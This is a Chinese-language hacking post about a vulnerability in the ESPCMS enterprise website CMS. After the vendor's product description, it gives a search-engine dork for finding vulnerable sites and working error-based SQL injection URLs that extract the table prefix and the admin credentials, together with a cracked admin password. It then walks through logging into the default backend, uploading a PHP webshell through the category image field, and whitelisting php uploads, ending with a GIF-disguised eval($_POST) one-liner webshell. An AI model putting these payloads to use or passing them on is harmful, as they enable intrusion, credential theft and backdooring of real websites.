易思ESPCMS企业网站管理系统漏洞

易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统

它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便

可以帮您迅速、轻松地构建起一个强大专业的企业网站。内置3GWAP手机网站、企业群站

模型字段自定义、SEO搜索优化、静态页生成、评论留言、订购、询价、会员、邮件订阅

邮件群发、广告、统计、自助表单等常见企业网站基本功能，通过灵活的插件机制还能扩展更多应用。

谷歌关键词： inurl:index.php?ac=article&at=read&did=

注入点(先爆表前缀）：www.hack1990.com/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),

concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),

floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名及密码:www.XXX.com/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),

concat((select (select concat(0x7e,0x27,username,0x27,password)) from

前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

用户名：admin   密码： 64039aa42fa57087e880a77a10f10298    

最后面的1数字不是 ，只截止到前32位,破解得 admin_tmtmw

默认后台：http://www.iick.blog/adminsoft/index.php

登录后， 系统设置 -->  分类管理 --> 文章修改 -- 分类图片（选择文件）

直接上传php一句话木马
 

webshell地址 ，如 http://www.iick.blog/upfile/20111201023506_245.php

然后菜刀

当上传不了php网马时，去系统设置一下，添加图片上传格式 |php 。这样就可以上传一个图片文件头的网马 ice.php 。

+------------------------- 密码 ice --------------------+

GIF89a
<?php @eval($_POST['ice']);?>

+----------------------------------------------------------+